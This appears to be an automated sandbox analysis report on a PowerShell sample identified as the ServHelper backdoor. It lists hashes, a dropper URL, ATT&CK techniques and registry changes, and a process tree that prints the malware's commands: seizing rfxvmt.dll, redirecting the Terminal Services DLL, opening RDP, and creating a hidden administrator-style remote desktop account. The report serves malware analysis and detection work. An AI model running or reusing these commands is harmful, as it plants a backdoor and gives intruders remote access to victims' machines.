servhelper | a32d35c527d278679bf19e45eb6f5841ad501f9e97da65dc6b5dade3ac762767

Analysis

max time kernel
93s
max time network
145s
platform
windows10-2004_x64
resource
win10v2004-20250217-en
resource tags

arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
submitted
13/03/2025, 11:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

edd23d9fccfb6d00bfe4c572f49e539e1a03a84ab985a84ec0d09ce8d85899fa.ps1
Size

2.5MB
MD5

54ea05f72d85e81abc662f81717b3a6e
SHA1

10cc7c97b12808c6d0011d24a5213ce315b6ad0e
SHA256

edd23d9fccfb6d00bfe4c572f49e539e1a03a84ab985a84ec0d09ce8d85899fa
SHA512

2b9fee3fd73c357345d61b3a642031cf38a1f4723ee377e318bb14f1a47954a7c229dc26da793cd3d6ab1ab5f565ed85aab402ca2047a7fd0e1f705944558290
SSDEEP

49152:cd8rheMFBvkc7Ti6PHckz0GepoCUnaw4Xmf7Em9sFqa:s

Score

10^/10

servhelper backdoor defense_evasion discovery execution exploit lateral_movement persistence trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Servhelper family
servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Remote Service Session Hijacking: RDP Hijacking 1 TTPs 6 IoCs

Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.

lateral_movement

RDP Hijacking

T1563.002

pid	Process
3536	cmd.exe
5040	net.exe
4476	net1.exe
4416	cmd.exe
1284	net.exe
1236	net1.exe

Blocklisted process makes network request 7 IoCs

flow	pid	Process
27	5020	powershell.exe
31	5020	powershell.exe
34	5020	powershell.exe
36	5020	powershell.exe
44	5020	powershell.exe
46	5020	powershell.exe
48	5020	powershell.exe

Indicator Removal: Network Share Connection Removal 1 TTPs 3 IoCs

Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.

defense_evasion

Network Share Connection Removal

T1070.005

pid	Process
4016	net1.exe
4616	cmd.exe
4292	net.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001

Possible privilege escalation attempt 8 IoCs

exploit

pid	Process
4200	icacls.exe
5088	icacls.exe
2636	icacls.exe
3428	icacls.exe
4308	icacls.exe
3108	takeown.exe
2356	icacls.exe
1216	icacls.exe

Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs

persistence

Terminal Services DLL

T1505.005

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"	reg.exe

Deletes itself 1 IoCs

pid	Process
4612	powershell.exe

Loads dropped DLL 2 IoCs

pid	Process
4848	Process not Found
4848	Process not Found

Modifies file permissions 1 TTPs 8 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2356	icacls.exe
1216	icacls.exe
4200	icacls.exe
5088	icacls.exe
2636	icacls.exe
3428	icacls.exe
4308	icacls.exe
3108	takeown.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
26	raw.githubusercontent.com
27	raw.githubusercontent.com

Drops file in System32 directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000c00000001e44c-66.dat	upx
behavioral2/files/0x000d00000001e4cf-67.dat	upx

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI	powershell.exe

Drops file in Windows directory 18 IoCs

description	ioc	Process
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_w212p2ft.vvz.psm1	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI76E.tmp	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_3atyx5gb.qct.ps1	powershell.exe
File created	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI75E.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI76F.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI780.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\shellbrd	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI791.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4612	powershell.exe
1712	powershell.exe
2088	powershell.exe
3696	powershell.exe
5020	powershell.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3952	WMIC.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\LowIcon = "inetcpl.cpl#005423"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data."	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon = "shell32.dll#0016"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\PMDisplayName = "Restricted sites [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags = "71"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1200 = "3"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer"	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = 7ecfc6db8f81db01	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags = "33"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1400 = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1400 = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\LowIcon = "inetcpl.cpl#005422"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "My Computer"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Icon = "inetcpl.cpl#00004480"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1200 = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data."	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SelfHealCount = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1400 = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1400 = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\DisplayName = "Trusted sites"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426"	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
1568	reg.exe

Runs net.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc	stream
HTTP User-Agent header	31	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	34	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)	1

Suspicious behavior: EnumeratesProcesses 15 IoCs

pid	Process
4612	powershell.exe
4612	powershell.exe
1712	powershell.exe
1712	powershell.exe
2088	powershell.exe
2088	powershell.exe
3696	powershell.exe
3696	powershell.exe
3696	powershell.exe
4612	powershell.exe
4612	powershell.exe
4612	powershell.exe
5020	powershell.exe
5020	powershell.exe
5020	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

pid	Process
664	Process not Found
664	Process not Found

Suspicious use of AdjustPrivilegeToken 18 IoCs

description	pid	Process
Token: SeDebugPrivilege	4612	powershell.exe
Token: SeDebugPrivilege	1712	powershell.exe
Token: SeDebugPrivilege	2088	powershell.exe
Token: SeDebugPrivilege	3696	powershell.exe
Token: SeRestorePrivilege	1216	icacls.exe
Token: SeAssignPrimaryTokenPrivilege	3952	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3952	WMIC.exe
Token: SeAuditPrivilege	3952	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	3952	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3952	WMIC.exe
Token: SeAuditPrivilege	3952	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	352	WMIC.exe
Token: SeIncreaseQuotaPrivilege	352	WMIC.exe
Token: SeAuditPrivilege	352	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	352	WMIC.exe
Token: SeIncreaseQuotaPrivilege	352	WMIC.exe
Token: SeAuditPrivilege	352	WMIC.exe
Token: SeDebugPrivilege	5020	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4612 wrote to memory of 1712	4612	powershell.exe	88
PID 4612 wrote to memory of 1712	4612	powershell.exe	88
PID 4612 wrote to memory of 2088	4612	powershell.exe	93
PID 4612 wrote to memory of 2088	4612	powershell.exe	93
PID 4612 wrote to memory of 3696	4612	powershell.exe	97
PID 4612 wrote to memory of 3696	4612	powershell.exe	97
PID 4612 wrote to memory of 3108	4612	powershell.exe	100
PID 4612 wrote to memory of 3108	4612	powershell.exe	100
PID 4612 wrote to memory of 2356	4612	powershell.exe	101
PID 4612 wrote to memory of 2356	4612	powershell.exe	101
PID 4612 wrote to memory of 1216	4612	powershell.exe	102
PID 4612 wrote to memory of 1216	4612	powershell.exe	102
PID 4612 wrote to memory of 4200	4612	powershell.exe	103
PID 4612 wrote to memory of 4200	4612	powershell.exe	103
PID 4612 wrote to memory of 5088	4612	powershell.exe	104
PID 4612 wrote to memory of 5088	4612	powershell.exe	104
PID 4612 wrote to memory of 2636	4612	powershell.exe	105
PID 4612 wrote to memory of 2636	4612	powershell.exe	105
PID 4612 wrote to memory of 3428	4612	powershell.exe	106
PID 4612 wrote to memory of 3428	4612	powershell.exe	106
PID 4612 wrote to memory of 4308	4612	powershell.exe	107
PID 4612 wrote to memory of 4308	4612	powershell.exe	107
PID 4612 wrote to memory of 4856	4612	powershell.exe	108
PID 4612 wrote to memory of 4856	4612	powershell.exe	108
PID 4612 wrote to memory of 1568	4612	powershell.exe	109
PID 4612 wrote to memory of 1568	4612	powershell.exe	109
PID 4612 wrote to memory of 3612	4612	powershell.exe	110
PID 4612 wrote to memory of 3612	4612	powershell.exe	110
PID 4612 wrote to memory of 2056	4612	powershell.exe	111
PID 4612 wrote to memory of 2056	4612	powershell.exe	111
PID 2056 wrote to memory of 4116	2056	net.exe	112
PID 2056 wrote to memory of 4116	2056	net.exe	112
PID 4612 wrote to memory of 1984	4612	powershell.exe	113
PID 4612 wrote to memory of 1984	4612	powershell.exe	113
PID 1984 wrote to memory of 4600	1984	cmd.exe	114
PID 1984 wrote to memory of 4600	1984	cmd.exe	114
PID 4600 wrote to memory of 1564	4600	cmd.exe	115
PID 4600 wrote to memory of 1564	4600	cmd.exe	115
PID 1564 wrote to memory of 4700	1564	net.exe	116
PID 1564 wrote to memory of 4700	1564	net.exe	116
PID 4612 wrote to memory of 312	4612	powershell.exe	117
PID 4612 wrote to memory of 312	4612	powershell.exe	117
PID 312 wrote to memory of 2784	312	cmd.exe	118
PID 312 wrote to memory of 2784	312	cmd.exe	118
PID 2784 wrote to memory of 3104	2784	cmd.exe	119
PID 2784 wrote to memory of 3104	2784	cmd.exe	119
PID 3104 wrote to memory of 4584	3104	net.exe	120
PID 3104 wrote to memory of 4584	3104	net.exe	120
PID 4616 wrote to memory of 4292	4616	cmd.exe	124
PID 4616 wrote to memory of 4292	4616	cmd.exe	124
PID 4292 wrote to memory of 4016	4292	net.exe	125
PID 4292 wrote to memory of 4016	4292	net.exe	125
PID 1864 wrote to memory of 4628	1864	cmd.exe	128
PID 1864 wrote to memory of 4628	1864	cmd.exe	128
PID 4628 wrote to memory of 3948	4628	net.exe	129
PID 4628 wrote to memory of 3948	4628	net.exe	129
PID 3536 wrote to memory of 5040	3536	cmd.exe	132
PID 3536 wrote to memory of 5040	3536	cmd.exe	132
PID 5040 wrote to memory of 4476	5040	net.exe	133
PID 5040 wrote to memory of 4476	5040	net.exe	133
PID 4416 wrote to memory of 1284	4416	cmd.exe	136
PID 4416 wrote to memory of 1284	4416	cmd.exe	136
PID 1284 wrote to memory of 1236	1284	net.exe	137
PID 1284 wrote to memory of 1236	1284	net.exe	137

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\edd23d9fccfb6d00bfe4c572f49e539e1a03a84ab985a84ec0d09ce8d85899fa.ps1
1⤵
- Deletes itself
- Drops file in System32 directory
- Drops file in Windows directory
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4612
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1712
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2088
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3696
- C:\Windows\system32\takeown.exe
  "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:3108
- C:\Windows\system32\icacls.exe
  "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:2356
- C:\Windows\system32\icacls.exe
  "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
  PID:1216
- C:\Windows\system32\icacls.exe
  "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:4200
- C:\Windows\system32\icacls.exe
  "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:5088
- C:\Windows\system32\icacls.exe
  "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:2636
- C:\Windows\system32\icacls.exe
  "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:3428
- C:\Windows\system32\icacls.exe
  "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:4308
- C:\Windows\system32\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
  2⤵
  PID:4856
- C:\Windows\system32\reg.exe
  "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
  2⤵
  - Server Software Component: Terminal Services DLL
  - Modifies registry key
  PID:1568
- C:\Windows\system32\reg.exe
  "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
  2⤵
  PID:3612
- C:\Windows\system32\net.exe
  "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2056
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    PID:4116
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1984
- - C:\Windows\system32\cmd.exe
    cmd /c net start rdpdr
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4600
  - - C:\Windows\system32\net.exe
      net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1564
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        5⤵
        
        PID:4700
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:312
- - C:\Windows\system32\cmd.exe
    cmd /c net start TermService
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2784
  - - C:\Windows\system32\net.exe
      net start TermService
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3104
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        5⤵
        
        PID:4584
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
  2⤵
  PID:708
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
  2⤵
  PID:4552

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
1⤵
- Indicator Removal: Network Share Connection Removal
- Suspicious use of WriteProcessMemory
PID:4616
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 000000 /del
  2⤵
  - Indicator Removal: Network Share Connection Removal
  - Suspicious use of WriteProcessMemory
  PID:4292
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
    3⤵
    - Indicator Removal: Network Share Connection Removal
    PID:4016

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc br3ioM93 /add
1⤵
- Suspicious use of WriteProcessMemory
PID:1864
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc br3ioM93 /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4628
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc br3ioM93 /add
    3⤵
    PID:3948

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
- Remote Service Session Hijacking: RDP Hijacking
- Suspicious use of WriteProcessMemory
PID:3536
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  2⤵
  - Remote Service Session Hijacking: RDP Hijacking
  - Suspicious use of WriteProcessMemory
  PID:5040
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    3⤵
    - Remote Service Session Hijacking: RDP Hijacking
    PID:4476

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" FRAVVDAE$ /ADD
1⤵
